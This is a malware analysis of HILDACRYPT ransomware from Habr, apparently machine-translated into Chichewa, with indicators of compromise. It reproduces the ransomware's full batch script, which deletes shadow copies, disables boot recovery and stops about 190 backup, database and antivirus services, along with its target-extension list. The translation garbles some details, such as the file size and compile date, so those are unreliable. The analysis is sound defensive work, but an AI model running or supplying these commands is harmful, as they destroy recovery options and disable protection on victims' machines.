Pa Habr! Ndipo kachiwiri, timalankhula za mtundu waposachedwa wa pulogalamu yaumbanda kuchokera mgulu la Ransomware. HILDACRYPT ndi chiwombolo chatsopano chochokera kubanja la Hilda chomwe chidapezeka mu Ogasiti 2019, chotchedwa chojambula cha Netflix chomwe chidagwiritsidwa ntchito kugawa pulogalamuyi. Lero tikudziwa zaukadaulo wa virus ya ransomware yomwe yasinthidwayi.
Mu mtundu woyamba wa Hilda ransomware, ulalo umakhala pa Youtube nkhani zamakanema zinali m'kalata ya dipo. HILDACRYPT imadziyika ngati choyika chovomerezeka cha XAMPP, kugawa kwa Apache kosavuta komwe kumaphatikizapo MariaDB, PHP, ndi Perl. Nthawi yomweyo, cryptolocker ili ndi dzina losiyana la fayilo - xamp. Kuphatikiza apo, fayilo ya ransomware ilibe siginecha yamagetsi.
Static Analysis
Chiwombolo chili mu fayilo ya PE32 .NET yolembedwa pansi pa MS Windows. Kukula kwake ndi 135 byte. Khodi yayikulu ya pulogalamu ndi nambala ya pulogalamu yoteteza zidalembedwa mu C #. Malinga ndi sitampu ya nthawi yophatikizira, binary idapangidwa pa Seputembara 168, 14.
Malinga ndi Detect It Easy, chiwombolocho chidasungidwa pogwiritsa ntchito Confuser ndi ConfuserEx, koma zosokoneza izi ndizofanana ndi kale, ConfuserEx yekha ndiye wolowa m'malo wa Confuser, kotero ma signature awo amafanana.
HILDACRYPT ilidi ndi ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Attack vector
Mwachidziwikire, chiwombolo chinapezeka pamasamba amodzi opangira mawebusayiti, akuwoneka ngati pulogalamu yovomerezeka ya XAMPP.
Mndandanda wonse wa matenda ukhoza kuwoneka mkati .
Obfuscation
Zingwe za Rhlengware zimasungidwa mu mawonekedwe obisika. Mukathamanga, HILDACRYPT imawachotsa pogwiritsa ntchito Base64 ndi AES-256-CBC.
kolowera
Choyamba, ransomware imapanga chikwatu mu %AppDataRoaming% yokhala ndi parameter yopangidwa mwachisawawa ya GUID (Globally Unique Identifier). Powonjezera fayilo ya .bat kumalo ano, kachilombo ka ransomware imayiyambitsa pogwiritsa ntchito cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & kutuluka
Kenako imayamba kuyika batch script kuletsa machitidwe kapena mautumiki.
Cholembacho chili ndi mndandanda wautali wa malamulo omwe amawononga makope amthunzi, kutseka SQL Server, zosunga zobwezeretsera, ndi mayankho a antivayirasi.
Mwachitsanzo, imayesa kuyimitsa zosunga zobwezeretsera za Acronis Backup. Kuphatikiza apo, imalimbana ndi machitidwe osunga zobwezeretsera ndi mayankho a antivayirasi a ogulitsa otsatirawa: Veeam, Sophos, Kaspersky, McAfee ndi ena.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Pambuyo pa mautumiki ndi njira zomwe tazitchula pamwambapa, crypto locker imasonkhanitsa zambiri zokhudzana ndi njira zonse zomwe zikuyenda pogwiritsa ntchito lamulo la mndandanda wa ntchito kuti zitsimikizire kuti ntchito zonse zofunika zatsitsidwa.
mndandanda wa ntchito v/fo csv
Lamuloli likuwonetsa mndandanda watsatanetsatane wamayendedwe, zomwe zimasiyanitsidwa ndi chizindikiro ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Pambuyo potsimikizira izi, ransomware imayamba kubisa.
Kubisa
Fayilo encryption
HILDACRYPT imadutsa muzinthu zonse zopezeka mu hard drive, kupatula mafoda a Recycle.Bin ndi Reference AssembliesMicrosoft. Yotsirizirayi ili ndi mafayilo ovuta a dll, pdb, etc. a mapulogalamu a .Net omwe angakhudze ransomware. Kusaka mafayilo oti asungidwe, mndandanda wotsatirawu umagwiritsidwa ntchito:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
The ransomware imagwiritsa ntchito algorithm ya AES-256-CBC kubisa mafayilo a ogwiritsa ntchito. Kukula kofunikira ndi 256 bits ndipo kukula kwa vector (IV) ndi 16 byte.
Pazithunzi zotsatirazi, zowona za byte_2 ndi byte_1 zidapezedwa mwachisawawa pogwiritsa ntchito GetBytes().
Mphindi
VI
Fayilo yobisidwa ili ndi kuwonjezera kwa HCY!.. Ichi ndi chitsanzo cha fayilo yobisidwa. Kiyi ndi IV zotchulidwa pamwambapa zidapangidwira fayiloyi.
Chinsinsi chachinsinsi
Cryptolocker imasunga kiyi ya AES yopangidwa mufayilo yobisika. Gawo loyamba la fayilo yosungidwa ili ndi mutu womwe uli ndi deta monga HILDACRYPT, KEY, IV, FileLen mu XML format ndipo ikuwoneka motere:
Kiyi ya AES ndi IV imasungidwa ndi RSA-2048 ndipo encoding ili ndi Base64. Kiyi yapagulu ya RSA imasungidwa m'thupi la cryptolocker mu imodzi mwa zingwe zobisidwa mumtundu wa XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Kiyi yapagulu ya RSA imagwiritsidwa ntchito kubisa kiyi ya fayilo ya AES. Kiyi ya RSA ya public ndi Base64 encoded ndipo imakhala ndi modulus ndi public exponent 65537. Decryption imafuna kiyi yachinsinsi ya RSA yomwe wowukirayo ali nayo.
Pambuyo pa RSA encryption, kiyi ya AES imasungidwa pogwiritsa ntchito Base64 yosungidwa mufayilo yosungidwa.
Chidziwitso cha Dipo
Pamapeto pa kubisa, HILDACRYPT imalemba fayilo ya html kufoda yomwe idalembamo mafayilo. Chidziwitso cha ransomware chili ndi ma adilesi awiri a imelo omwe wozunzidwayo angagwiritse ntchito kulumikizana ndi wowukirayo.
Chidziwitso cholanda chilinso ndi mzere wakuti "No loli ndi otetezeka;)" - "Palibe loli ndi otetezeka;)", kutanthauza otchulidwa anime ndi manga okhala ndi mawonekedwe a atsikana ang'onoang'ono omwe ali oletsedwa ku Japan.
Pomaliza
HILDACRYPT, banja latsopano la ransomware, latulutsa mtundu watsopano. Mtundu wa encryption umalepheretsa wozunzidwayo kuti asatseke mafayilo osungidwa ndi ransomware. Cryptolocker amagwiritsa ntchito njira zodzitetezera kuti aletse ntchito zoteteza zokhudzana ndi machitidwe osunga zobwezeretsera ndi mayankho a antivayirasi. Wolemba wa HILDACRYPT ndiwokonda mndandanda wamakanema a Netflix Hilda, kalavani yomwe idaphatikizidwa mu kalata yobwereranso ku mtundu wakale wa pulogalamuyi.
Nthawi zambiri, и imatha kuteteza kompyuta yanu ku HILDACRYPT ransomware, ndipo opereka amatha kuteteza makasitomala awo . Chitetezo chimatsimikiziridwa ndi mfundo yakuti mayankhowa akuphatikizapo sikuphatikizanso zosunga zobwezeretsera, komanso chitetezo chathu chophatikizika ndi ukadaulo wophunzirira makina opangidwa ndi makina ozikidwa pamakhalidwe omwe amatha kuthana ndi ziwopsezo za chiwombolo zamasiku a ziro monga momwe zimakhalira.
Zizindikiro zakunyengerera
Zowonjezera mafayilo HCY!
HILDACRYPTreadMe.html
xamp.exe ndi "p" imodzi ndipo palibe siginecha ya digito
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com